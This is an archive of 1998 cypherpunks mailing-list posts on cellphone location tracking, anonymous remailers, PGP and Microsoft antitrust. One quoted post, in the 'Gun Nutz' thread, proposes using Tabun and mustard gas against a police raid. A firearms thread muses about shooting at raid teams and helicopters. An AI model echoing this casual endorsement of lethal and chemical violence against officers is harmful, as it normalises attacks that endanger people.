Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNK4VhQBMw4+NR29ZAQHBPggAhJ2CnjBM0+5R6gHoWIOktua6OTjRQZK+
RUN6nRF3HezE1ZHrpIx6HO0fSCjyCCO0YUFu7VY66rTQ0FfwP3Czax1965xmKOpw
QN7zvyvcBeiO4Pc2K9RhpwcskYlOFVUwwkoxFOEKEb9TL7urk4G3K8pTkx8ArW0+
x/rSQ3SKomzZKHJVOQq5IV8q+fFxGSSDElyKOnE0gSf//OuLpxHpUtMTIciMT6xd
8lGSFlFopONAOGixCFalbAJl1wE+LnYFuSRjCQVlNx18z0DsFWvtvDNBzZ353gfj
4Ma0w2XTQT8LEWoZfGceSHE+8gr+BVsWwLljf5Qmr7dpBxMCAOC4IQ==
=2wNG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 3 Jan 1998 21:00:22 +0800
To: cypherpunks@toad.com
Subject: The Codeleakers
Message-ID: <1.5.4.32.19980103125335.0073b628@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.mercury-rising.com/

                  Mercury Rising

Art Jeffries (Bruce Willis), a disillusioned, outcast FBI agent, is 
the only one who can protect an orphaned nine-year-old autistic 
savant (Miko Hughes) when he becomes the target of assassins after
inadvertently deciphering a top-secret government military code.
Lt. Colonel Nicholas Kudrow (Alec Baldwin) is the National Security
agent assigned to unveil the source of the code's leak. 

                    Preview
            5fps - 4.9MB / 10fps - 8.1MB 

            The film opens April 3, 1998.
                Website Coming Soon! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Sun, 4 Jan 1998 01:53:11 +0800
To: Kay Ping <cypherpunks@toad.com
Subject: Re: Location Escrow anyone ?
In-Reply-To: <19980103133555.12753.qmail@nym.alias.net>
Message-ID: <v03102801b0d424a75bcf@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:35 PM +0000 1/3/98, Kay Ping wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>>>ZURICH (December 28, 1997 4:12 p.m. EST http://www.nando.net) - Swiss
>>>police have secretly tracked the whereabouts of mobile phone users via a
>>>telephone company computer that records billions of movements going back
>>>more than half a year, a Sunday newspaper reported.
>>
>>Don't be fooled that this is a swiss only problem. It's being done here in
>>Amerika right now.
>
>The FCC has issued a ruling that will require all cellular telephone
>carriers to provide location information on all 911 calls. By the year
>2001, this location information is to provide 125 metres of accuracy 67%
>of the time.

The FCC may have ruled it, but its doubtful that the carriers can provide it.  Doing better than than a cell sector will depend on many factors, including: specific technology (analog, GSM, CDMA, etc.), frequency and local propagation characteristics, especially multipath conditions.

>From parallel discussions on the cryptography list:

800 MHz analog may be the most difficult. GSM perhaps can reach 500 meteres under ideal conditions (Andreas Bogk).  IS-95/CDMA probably a bit better than GSM due to the very high data (chip) rate and spread spectrum's better multipath characteristics, although the system's multipath performance most improves communications not ranging (Phil Karn, Qualcomm).

--Steve

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------
Steve Schear              | tel: (702) 658-2654
CEO                       | fax: (702) 658-2673
Lammar Laboratories       |
7075 West Gowan Road      |
Suite 2148                |
Las Vegas, NV 89129       | Internet: schear@lvdi.net
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 4 Jan 1998 00:21:57 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <v03102809b0d33f81c06a@[207.167.93.63]>
Message-ID: <N0Jqie1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> And on a more serious note, one thing this affair shows is that once again,
> the Kennedy clan (KC)  lives by different rules. Whether it's Edward
> Kennedy getting off in the Mary Jo Kopechne case, when any of us would have
> likely been charged with a) drunk driving, b) leaving the scene, c) lying
> in an investigation, or whether it's this very same Michael Kennedy getting
> off with his underage babysitter....

Joe Kennedy was a common thug, no different from the Gambinos and the
Genoveses. He made millions of dollars during the prohibition smuggling
whiskey from Canada. He personally murdered numerous of fellow drug dealers
and law enforcement officers (OK, he's not all bad :-) and dozens more were
murdered on his orders. He then bought political offices for his kids,
which is precisely what his colleagues - cocaine and heroin deales from
Cali, medellin, etc cartels - get blamed for in Mexico and Colombia.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad <bdolan@USIT.NET>
Date: Sun, 4 Jan 1998 01:08:12 +0800
To: cypherpunks@Algebra.COM
Subject: Which side are you on, brother?
In-Reply-To: <Pine.BSF.3.96.980103151003.4080A-100000@pakastelohi.cypherpunks.to>
Message-ID: <Pine.GSO.3.96.980103114644.17283F-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



Watching the DOJ/MS fight is sort of like watching Iraq and Iran fight.
Or Iraq and Kuwait.  I have a hard time working up much enthusiasm for
either side.  

What finally knocked me onto {gasp, choke} Gates' side, was the following:

WSJ, p. A16, 12/23/97

 Dole Backing Effort to Slow Microsoft Plan

 Washington - Former Senate Majority Leader Bob Dole has been sending
 letters and calling companies seeking their support in an expanding
 campaign to curb Microsoft Corp.'s entrance into new Internet businesses.

 Mr. Dole is part of a nascent but growing lobbying effort that goes far
 beyond issues raised by the Justice Department's antitrust case against
 Microsoft. ...

 Mr. Dole is representing several companies, including Microsoft computer
 rivals Netscape Communications Corp., and Sun Microsystems Corp., and
 Sabre Group Holdings Inc., a Dallas-based airlines reservation system
 that faces competition from Microsoft. ...

 In a recent letter to one company that has been approached for support,
 Mr. Dole wrote:  "In the coming months, we will need to educate the
 public, the administration, and Congress about the dangers of a
 laissez-faire attitude toward Microsoft.  I am personally convinced that
 if nothing is done now, it will become increasingly difficult to have
 fair competition in the years ahead.  That is why we will need companies
 like yours to help finance and support our efforts.

 Mr. Dole, who was travelling in Bosnia yesterday with President Clinton,
 couldn't be reached for comment. ...


Whenever both heads of the DemoPublican hydra agree, they're circling the
wagons to protect their "vital interests" against the barbarians.  I'm
rooting for the barbarians, no matter how stinky they are.

Brad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 4 Jan 1998 16:45:35 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: Gun Nutz
In-Reply-To: <Pine.BSF.3.96.980104030244.4869B-100000@pakastelohi.cypherpunks.to>
Message-ID: <Pine.BSF.3.91.980103132354.19614B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 4 Jan 1998, Lucky Green wrote:

> On 3 Jan 1998, Ryan Lackey wrote:
> > It would be interesting to fit one's house with speakers/noise generators/
> > flash generators/smoke/etc. to make it look as if one has an automatic
> > cannon or a small army, in response to a raid.  It would make a perfect
> > distraction during which to leave :)
> 
> [The following is a theoretical discusion. Do not try this at home].
> 
> What you really want is the ability to slow down the mobility of the raid
> force while making your exit. In a prolonged siege, the attacker will
> always win.  A good way of slowing down the attacker after an initial
> armed response is to deploy chemicals. A combination of Tabun and Mustard
> Gas works best, but don't deploy them at the same time. Use the Tabun
> first for maximium impact. Follow up with the Mustard Gas a few minutes
> later.

Setting this off in an inhabited area is sure to make you a popular hero.

You'd be better off investing in a tunnel. Maybe Seymour Cray could use a 
job about now ...  ;)

(I never bought that car accident cover - he and Elvis are probably 
hangin' out in Tonga)

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Ping <kping@nym.alias.net>
Date: Sat, 3 Jan 1998 21:45:21 +0800
To: cypherpunks@toad.com
Subject: Re: Location Escrow anyone ?
Message-ID: <19980103133555.12753.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>>ZURICH (December 28, 1997 4:12 p.m. EST http://www.nando.net) - Swiss
>>police have secretly tracked the whereabouts of mobile phone users via a
>>telephone company computer that records billions of movements going back
>>more than half a year, a Sunday newspaper reported.
>
>Don't be fooled that this is a swiss only problem. It's being done here in
>Amerika right now.

The FCC has issued a ruling that will require all cellular telephone
carriers to provide location information on all 911 calls. By the year
2001, this location information is to provide 125 metres of accuracy 67%
of the time.

Helping emergency services locate 911 callers is a great excuse for 
installing  a cellular location system. Even better than the excuses they 
gave for eavesdropping-ready digital switches and limits on encryption.

An accuracy of 125 meters seems quite impressive considering the facts
that cellular channels are plagued by very long multipath dispersion and
that a narrowband FM signal is much less than ideal for calculating delay.

- --------------
Kay Ping
nop 'til you drop

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQEQAwUBNK4a2hHPAso8Qp7tAQFI1wfRARzxzUTRWkuETjkWrz7Gh4StMEwhCZ6C
Nzh2i2ymTq2/hMMdx7L8tuc2N5wISlBjzJtJGKnyQTHYJs6SMkvYLQa89H4v4MyH
9NJK6wSqx1OLEmgPwCoJWo8NUkH1jwPvhRfb+A/KE3raYazMd1fY+EgL/P3R216s
j0F0RsPUFvMS3m+/j5rKFoatuG1Qc6b2p8QnQLxgxyePoEScEEcfxiCrGGH75YEF
5yiJMi11LraUnDyJtZ/9xVXAFAEjLM9IYyCapfleIEUNisu9Iu3R9V/FIBdEom3O
uL7we6ETWSrYCFxdmrDq64q7wi1ygN/d1IvIFgNzSol/D9Y=
=czyT
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandre Maret <amaret@infomaniak.ch>
Date: Sat, 3 Jan 1998 21:49:44 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Location Escrow anyone ?
In-Reply-To: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980102034537Z-4222@ixf2m1.isd.tafensw.edu.au>
Message-ID: <34AE4047.212669B2@infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain



The LPD (law on data protection) :
	http://193.5.216.40/ch/f/rs/235_1/index.html
	http://193.5.216.40/ch/f/rs/235_11/index.html
	(in french, italian, german only)

The LPD states that you can get a copy of your database entry printed
on paper, for a cost of max 300SFrs (about US$200), unless some special
cases which have to be specified in the law. Since the debate is based
on the fact that there is no legal text that allows swisscom to record
these informations, there is no legal text that allow them not to
communicate your informations on request. I'm not a jurist, but it
may be an interesting path to follow.

If they store the location of your phone every 3 secs, for 6 month,
this means 5'241'600 locations. Printed on 70 lines/page paper,
this means 74'880 A4 pages. Do you think they'd be happy to print
and send you 74'880 pages for 300SFrs ?

There is certain rules that allow them to postpone your request.
However, they have to tell you before. Just wondering what would
happen if 100'000 people asks for their last 6 month of positions...

> >Swiss Federal Data Protection Commissioner: http://www.edsb.ch/
> >mostly empty... not a word about these 2 stories. you see how the
> >swiss people are informed...
> 
> Now this guy (Odilo Guntern) seems to have no clue about anything...

Last month, I was thinking about launching a web site to inform
swiss citizen about these issues. A kind of swiss EPIC. However,
I can't do this alone.

If anybody is interested by this idea, drop me a mail.

> Wanna get more paranoid? Some companies log all Internet traffic of their
> employees

hmmm... no need to become more paranoid, enough is enough.

> that passes through their proxy (which you have to use for anything to
> work) for
> some weeks (Weren't you the one chatting on #really-naughty-bits for more
> than 1
> hour on Monday??).
> And of course, phonenumbers you call in your company are logged, too.

swisscom does it. They log all the internal/external mail of their
employees...

  alex





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sat, 3 Jan 1998 22:14:07 +0800
To: cypherpunks@Algebra.COM
Subject: Remailer under NT [was:Re: your mail]
In-Reply-To: <199801011858.KAA07272@sirius.infonex.com>
Message-ID: <Pine.BSF.3.96.980103151003.4080A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 1 Jan 1998, Mix wrote:

> Okay, I'd like to set up a remailer - but I don't know where to start!
> Unfortunatly it's going to have to run on an NT 4.0 box, so the winsock
> remailer is out of the question, right? And I'm not in the US, so I
> can't use the juno stuff -- so what (if anything) *can* I use? 

AT&T offers a free UNIX (korn shell) emulator for NT. Check
ftp://ftp.research.att.com/

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred. 
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 3 Jan 1998 23:09:43 +0800
To: cypherpunks@toad.com
Subject: eudora plugin
Message-ID: <199801031502.QAA19999@linux.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



There would by chance be anyone around who would know where the 
Eudora Plugin Patch for PGP 5.5 (NT/95) can be downloaded (or aquired
otherwise) outside USA?
(http://www.pgp.com/products/eudora.cgi) 

Thanks,
Remo
-----------------------------------------------------
Fate favors the prepared mind. (from "Under Siege 3")
-----------------------------------------------------
Remo Pini                         T: +41  1 350 28 88
Pini Computer Trading             N: +41 79 216 15 51
http://www.rpini.com/                 E: rp@rpini.com
key: http://www.rpini.com/crypto/remopini.asc        
-----------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Sun, 4 Jan 1998 05:17:54 +0800
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns] (fwd)
Message-ID: <tw77m8hi7zs.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've only seen bolt action .50s fired.  They're not *too* heavy, and
from the amount of muzzle flash, noise, etc. it gave, I'd be as comfortable
using it at 1000-1500 yards as I would a .308 at 600-1000 yards.  Given
proper concealment and the absence of anyone looking directly at you
when you fire, that is.  Professional sniping is a 2 man operation anyway --
against a target that can shoot back, you really want to have a spotter.

>From what I can gather, the US military seems to agree with this
strategy -- .308s for traditional sniping, .50 for anti-materiel, extreme
long range, and countersniping.  Attacking an incoming force which has
its own snipers is mostly a job for the .50.  And if I were in the field
on the offense, I'd be attacking small enough groups that a few .50
rounds would be sufficient to kill them all or at least immobilize them.
Or high enough value targets to make a more likely kill worth the higher
risk during E&E.  True, they mainly use bolt-action .50s -- if the semi
auto version is really that much heavier, I'd probably go for the bolt
action gun in the field and the semi at my home.

For Tim May's situation, in a house, they know fairly well that he's firing
from the house.  Pretty much any weapon will give enough signature for them to
zero in on it and fire.  If he's lucky, and they just have carbines and
7.62 snipers, he could fire from one room, move to another, fire, etc.  Or have
enough cover to keep himself from getting hit.  But at some point, they'll
just bring in a real countersniper asset, like an automatic cannon, and
any muzzle flash will be responded to with several hundred AP/explosive shells.
Within the house, the weight of a .50 isn't that bad -- and the extra 500-1000
yards and AP capability might make a difference against a raid.  At the very
least, it'll get his place firebombed rather than shot up :)  Forcing
them to keep outside the 1500-2000 yard high danger range from a .50 (or
forcing them to stay behind serious cover) would give him a chance to duck
out and fight another day, too :)  A .50 is also a bit more effective
against helicopters containing special forces "monitoring" personnel
who are there (but of course not actually there) in violation of the law.

It would be interesting to fit one's house with speakers/noise generators/
flash generators/smoke/etc. to make it look as if one has an automatic
cannon or a small army, in response to a raid.  It would make a perfect
distraction during which to leave :)


I'd much rather write code, make money, and leave the country (not
necessarily in that order) than worry about defending myself from a
government which has shown time and time again it is willing to ignore
the law, though.

[ObCrypto:
* Eternity DDS is coming along.  The current almost-ready-for-announcement
version is using Postgres95 for a backend, sigh.  Design for the
first production-demo system is progressing as well.

* The Cypherpunks Archive project I was working on is also progressing.
Unfortunately, my archive is kind of weird -- it's in MIT discuss
format, and converting it into mbox is nontrivial, given the size of the
file.  After adding more memory to the system on which I'm editing the
file, I think I have an mbox file which is just missing one field.  I'm
planning to index them with hypermail, then glimpse.  On the cd, I'll
put the original mbox file, either as a single massive file or broken up,
depending on what people want, as well as a precomputed index and perhaps
the web site version as well.  The next step is to put all of the cypherpunks
archives into Eternity DDS -- Postgres95 seems to puke on large data objects
sometimes, so I'll need to fix that.

Once I get the cypherpunks archive done, I'll work on some other lists.  And
then hopefully some people will buy CD-Rs so I can buy another 25gb of HDD
or so :)

* Financial people are pretty cool.  I just got back from talking to some
about the Eternity Service concept, and they were really excited.  I really
didn't expect non-(electronic finance) finance people to be interested in it 
right away.  They even got more excited when the magic word "cryptography"
was mentioned.  Perhaps finance will fix the software industry.
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sun, 4 Jan 1998 06:01:20 +0800
To: "Ryan Lackey" <rdl@mit.edu>
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns] (fwd)
Message-ID: <199801032150.QAA29689@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/3/98 4:05 PM, Ryan Lackey (rdl@mit.edu)  passed this wisdom:

>I've only seen bolt action .50s fired. They're not *too* heavy, and 
>from the amount of muzzle flash, noise, etc. it gave, I'd be as 
>comfortableusing it at 1000-1500 yards as I would a .308 at 
>600-1000 yards. Given proper concealment and the absence of anyone 
>looking directly at you when you fire, that is. Professional 
>sniping is a 2 man operation anyway --against a target that can 
>shoot back, you really want to have a spotter.  

I finally remebered where I saw it. In Tom Clancy's non-fiction book
"MARINE: A Guided Tour of a Marine Expeditionary Unit." On pages 75-77
(there is a good picture too) he details the history and developement
as well as the uses of the "Barrett M82A1A .50-cal special-purpose
sniper rifle." It is for all intents and purposes a Brownig M2 .50-cal
machine gun barrel/receiver set o a newly designed spring recoil
system to be fired from shoulder wit bipod. It is chambered for the
NATO standard .50-cal/12.7mm ammunition. It was developed by Ronnie
Barrett of Murfeesboro, Tennessee and further developement sponsored
by the USG and was first deployed by the CIA with the Mujahadeen in
Afgahnistan where they used it to make some Russian troops quite
miserable from a long way off. The sucess of it in Afghanistan force
the military to consider it. Nothing is said concerning other services
but it has been adopted by the USMC Force Recon for use by a three man
team. The gun is broken down into upper reciever, lower reciver, and
scope and ammo.

  There may be .50-cal bolt actions out there that are one man
carries, but the Barrett gun is a three man load. The gun is 57 inches
long and weighs 32.5 pounds, unloaded with no scope. The primary
mission of the gun is not man sniping, though I am sure it often has
been and will be used in that role, but its main aim is to long range
snipe and disable antennae, dishes, equipment, etc using the AP and
API ammunition.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNK6ybj7r4fUXwraZAQGSNgf/X6+K6j5lzj1odfzDM0HUfTnNzcc/RgSD
OHHelk3Elb0jLDIX76KJsVOghDQ228QA+dFa+dEH+3YyjquIclKp4UBrfqw42Rfd
Fv/HVinE9qLKse4PVY3Mjeqt8jHCGO01RHNATnrArDA6C2lVJIeE1tIDVGDVVtI2
bndGRnOexSXrFSm+5ux1GejWUYzUbLiQIOmfNSJMpzi8WwfQ/I3OLyFm5I6y9DR1
IiQZRs4RoqJ6f4caiZWz62/L6iivwKsOX6LCHlZAjz/6Ld+/o6ZtC0cjn/yWtUqL
+3n/ZVydK+jGQ+rHopM4Eg1NGL5aRt+ANkKRDeTXohNlwfkCvI4xGA==
=zI8W
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

	"You need only reflect that one of the best ways to get yourself a 
    reputation as a dangerous citizen these days is to go around repeating
   the very phrases which our founding fathers used in their struggle for
   independence." -- Charles M. Beard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sun, 4 Jan 1998 11:12:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Microsoft
In-Reply-To: <199801040125.CAA09309@basement.replay.com>
Message-ID: <3.0.5.32.19980103190024.038b0d80@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 02:25 AM 1/4/98 +0100, Anonymous wrote:
>
>Windows is still fucking me up the ass! I'm bleeding to death here!

Then get a copy of Linux and stop whining!

Sheesh!

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 4 Jan 1998 10:06:36 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Microsoft
In-Reply-To: <199801040125.CAA09309@basement.replay.com>
Message-ID: <199801040209.VAA17936@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801040125.CAA09309@basement.replay.com>, on 01/04/98 
   at 02:25 AM, Anonymous <nobody@REPLAY.COM> said:


>Windows is still fucking me up the ass! I'm bleeding to death here!

Well when you bend over and squeal like a pig what do you expect?!?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNK7taY9Co1n+aLhhAQHNiwQAxieliKHUE97aAZ+eZ0u64vtO4eZaaQyz
vjdLpOksrSRuF9+m2PqOcwf4tjSHUHR5g6C90fjiGR8Cs2sFD6eWByCOGlR2r5t0
DAiZA7WryKf3V06mw6266F2VaeRIZ5HUrKaCXeGPtb2I8kGKwCuWqM6kGLnzt96S
J1C+ddiKFsk=
=Mllk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sun, 4 Jan 1998 09:34:11 +0800
To: cypherpunks@Algebra.COM
Subject: Meganet's Unbreakable Virtual Matrix Encryption Takes the Market by St
Message-ID: <400641a667f1ebd324c0c58d8ef866f9@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



>          Yes, the VME 98 is the same product that challenged Microsoft,
>          IBM, AT&T, Dell, Hewlett-Packard, Intel, America Online,
>          Netscape, etc. to break a VME encrypted file. All the great
>          computer minds in this country have had an opportunity to
>          dispel the bold claims of unbreakable encryption, yet none have.

Why should Microsoft, IBM, AT&T, Dell, Hewlett-Packard, Intel, America
Online, Netscape, "all the great computer minds in this country," etc. give
a flying fuck?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Sat, 3 Jan 1998 19:12:29 +0800
To: Paul Bradley <paul@fatmans.demon.co.uk>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <Pine.LNX.3.91.980101201216.1054A-100000@fatmans.demon.co.uk>
Message-ID: <Pine.LNX.3.93.980103202220.155C-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 1 Jan 1998, Paul Bradley wrote:

[...]

> > Welcome to the 20th Century, moron.
> 
> You clearly have no comprehension of the principles of the free market 
> and the rights of businesses and individual to hire and fire whoever the 
> fuck they like for any reason whatsoever.

My rights to swing my fists end at your noise.  When ever you interact
with other peaple your rights are tempered by there rights.  Even Adam
Smith recognised that its was gorverments dutie to redress the failing of
the market.

Also recall the free market model assumes that the word is full of totaly
rational pepeale who have full knowige of the market.  Any one who has
been on this list knows that these peaple are somewhat uncommen.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNK4GM6QK0ynCmdStAQFE7AP/Xgnf8xsGsovspmlzG8xRLCBPKAcAco1d
hwUg752OPyjDksq6ZlM4eQNckRAwXWtEVethqJFXk/Wgyl0//f9L5zjSv/f1siAg
uYUpElxwajL23W6AZjMVqhBqIn1daeI7PIlJy1iBfE2151fPuPQ8Ox6XHVbDjqZC
KR/CjYA0uCY=
=3e/G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carsten Hartwig <carsten.hartwig@rhein-main.net>
Date: Sun, 4 Jan 1998 04:04:41 +0800
To: Brad <cypherpunks@Algebra.COM
Subject: Re: Which side are you on, brother?
In-Reply-To: <Pine.BSF.3.96.980103151003.4080A-100000@pakastelohi.cypherpunks.to>
Message-ID: <3.0.5.32.19980103205938.007c1100@mail.rhein-main.net>
MIME-Version: 1.0
Content-Type: text/enriched

 At 12:04 03.01.98 -0500, Brad wrote:
> Dole Backing Effort to Slow Microsoft Plan

Good call :-)
It is a good plan indeed. Looking at the OS-market, one can speak of a monopoly of Microsoft.
We know, what monopolies lead to. In terms of security, this is a frightening thought. We all
have seen security breaches by the software, be it Windows itself or the Internet explorer.
AND we know how long it takes Microsoft to adapt to new standards. I'm quite confident that 
the guys at MS still think, that a 56-bit DES key is impossible to break ;-)
I think, this matter deserves further investigation.
Carsten
PGP Fingerprint: 70AB EA30 A3E0 655E A3FB  3B6B 76CE 4790 A8F9 DB7A
Public Key available on: pgpkeys.mit.edu:11371 for carsten.hartwig@rhein-main.net

carsten.hartwig@rhein-main.net
carsten.hartwig@frankfurt.netsurf.de
inferno.web@t-online.de
werfrosch1@aol.com
ICQ: 6167944





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Sun, 4 Jan 1998 13:02:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Time to Pay the Piper
Message-ID: <3.0.32.19980103210255.006ddcf8@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Attila T. Hun wrote:

>    1)  when a true market monopoly exists, society _is_
>        entitled to intervene.  [. . .]
   
>    2)  why should you be surprised to hear this from me? 
>        sure, I would prefer anarchy per se, but have
>        absolutely no faith that the vast majority would do
>        anything except rape, pillage, and plunder.  [. . . .]
.......................................................................

Well, between the "raping, pillaging, plundering" society of people who
can't do better than to follow in the path which Billg prepares for them,
and the "entitled" right of these same pillaging, plundering, sheeple to
intervene in a "true market monopoly" which they themselves participated in
creating, if only by default (intervening so they don't become exhausted
from all that decision making - Unix, or Perl?  Unix, or Wintel? This is
too hard!!), and the attitude of Governors of the People's Interest who
live to protects us from pillaging, plundering monopolists, all the while
doing a little undercover raping of their own, all I can say is, "it's a
Wonderful Society".

And who wouldn't want to be a member of such a society, and who wouldn't
want to intervene on the behalf of its citizens, none of whom have,
apparently, yet "proved their worth" on this planet?   (I'm surprised
there's still so many of them, considering all the "good" guys trying to
help them, and considering that they've been receiving "help" for their
condition from everywhere - left and right, up and down, here and there -
for many, many, years, now.)

wheN are PEE-ple GOing towake UP.
The Truth is Out There.
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Dustman <andy@neptune.chem.uga.edu>
Date: Sun, 4 Jan 1998 11:10:50 +0800
To: Charlie Comsec <comsec@nym.alias.net>
Subject: Re: [RePol] Re: Remailer Logs (and Accountability)
In-Reply-To: <19980103050003.766.qmail@nym.alias.net>
Message-ID: <Pine.LNX.3.94.980103214235.6085G-100000@neptune.chem.uga.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 3 Jan 1998, Charlie Comsec wrote:

> > The "reordering pool" is
> > always a minimum of 5 messages so people can opt for how long their
> > message wil be 'stashed' at replay. (use 'Latency: +00:00' for zero latecy).
> 
> Is that default reordering pool size the same for Type I and Type II
> messages?

Type-II messages don't support latency yet (or not until fairly recently,
I can't remember). Type-I remailers don't, by default, do any reordering,
but reordering is not as useful for type-I messages (unless you remix). 
Cracker uses Mixmaster to reorder type-I messages. In addition to the pool
size of 5, it also will remail a maximum of half the messages present, so
in reality, the pool size floats up and down (but not lower than 5).

> Perhaps someone can double-check my math on this.  Assuming
> equally-sized messages that are otherwise indistinguishable, and a
> reordering pool size of five, then the odds of matching up an
> encrypted incoming message with an encrypted outgoing message are
> one in five.

The odds are somewhat worse (for the attacker). In the case of the
